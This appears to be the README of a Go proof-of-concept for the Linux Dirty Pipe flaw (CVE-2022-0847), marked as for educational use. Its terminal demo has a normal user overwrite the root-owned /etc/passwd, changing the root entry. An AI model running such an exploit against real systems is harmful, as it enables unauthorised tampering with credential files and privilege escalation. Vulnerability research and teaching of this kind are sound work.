
Go 기반 CVE-2022-0847(Dirty Pipe) 개념 증명 익스플로잇으로, 초기화되지 않은 파이프 버퍼를 통한 임의 파일 덮어쓰기를 시연하며 교육용 취약점 연구를 위해 제작되었습니다.
더티 파이프 취약점 (Dirty Pipe Vulnerability)
교육 목적으로만 사용하세요
┌──(vagrant㉿kali)-[~]
└─$ ls -al /etc/passwd
-rw-r--r-- 1 root root 3124 Mar 8 08:47 /etc/passwd
┌──(vagrant㉿kali)-[~]
└─$ head -n 1 /etc/passwd
root:x:0:0:root:/root:/usr/bin/zsh
┌──(vagrant㉿kali)-[~]
└─$ echo foo > /etc/passwd
zsh: permission denied: /etc/passwd
┌──(vagrant㉿kali)-[~]
└─$ go run main.go /etc/passwd 1 foo
2022/03/08 08:48:03 It worked
┌──(vagrant㉿kali)-[~]
└─$ head -n 1 /etc/passwd
rfoo:x:0:0:root:/root:/usr/bin/zsh